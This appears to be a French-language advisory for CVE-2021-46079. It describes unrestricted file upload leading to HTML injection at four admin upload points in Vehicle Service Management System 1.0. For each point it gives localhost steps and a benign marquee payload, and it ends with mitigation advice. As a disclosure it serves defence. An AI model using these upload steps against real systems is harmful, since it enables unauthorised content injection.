CVE-2021-46079
Titre de l'exploit: Vehicle Service Management System - Téléchargement de fichiers 'Multiples' conduit à une injection HTML
Auteur de l'exploit: SANU P.L
CVE: CVE-2021-46079
CVSS : 7.2 ÉLEVÉ
Références :
Description :
Une vulnérabilité de téléchargement de fichiers sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants conduisant à une injection HTML.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section My Account http://localhost/vehicle_service/admin/?page=user
Charge utile :
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
- Dans la section My Account, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
- Cliquez sur le bouton de mise à jour.
- Ouvrez l'image de l'avatar dans un nouvel onglet.
- L'injection HTML est exécutée.
2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section User List et cliquez sur le bouton Create New.
Charge utile :
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
- Dans la page Create New User, saisissez tous les détails requis et parcourez le fichier HTML dans Avatar.
- Cliquez sur le bouton Save.
- Ouvrez l'image de l'avatar dans un nouvel onglet.
- L'injection HTML est exécutée.
3. Vehicle Service Management System - 'Paramètres - Logo du système' (/admin/?page=system_info)
Charge utile :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info
Charge utile :
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
- Dans la section Settings, saisissez tous les détails requis et parcourez le fichier HTML dans System Logo.
- Cliquez sur le bouton de mise à jour.
- Ouvrez l'image System Logo dans un nouvel onglet.
- L'injection HTML est exécutée.
4. Vehicle Service Management System - 'Paramètres - Couverture du site Web' (/admin/?page=system_info)
Exploit :
- Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
- Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info
Charge utile :
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
- Enregistrez le code HTML ci-dessus, par exemple : Html Injection.html
- Dans la section Settings, saisissez tous les détails requis et parcourez le fichier HTML dans Website Cover.
- Cliquez sur le bouton de mise à jour.
- Ouvrez l'image Website Cover dans un nouvel onglet.
- L'injection HTML est exécutée.
Impact :
Un attaquant peut télécharger un fichier malveillant sur plusieurs points de terminaison, ce qui conduit à une injection HTML.
Atténuation :
Il est recommandé de mettre en œuvre les mesures suivantes :
- N'accepter jamais un nom de fichier et son extension directement sans avoir une liste blanche de filtrage.
- S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé d'accepter uniquement des caractères alphanumériques et un seul point comme entrée pour le nom de fichier et l'extension.
- Limiter la taille du fichier à une valeur maximale afin d'empêcher les attaques par déni de service.
- Le répertoire de téléchargement ne doit avoir aucune permission 'execute'.
- Ne comptez pas uniquement sur la validation côté client.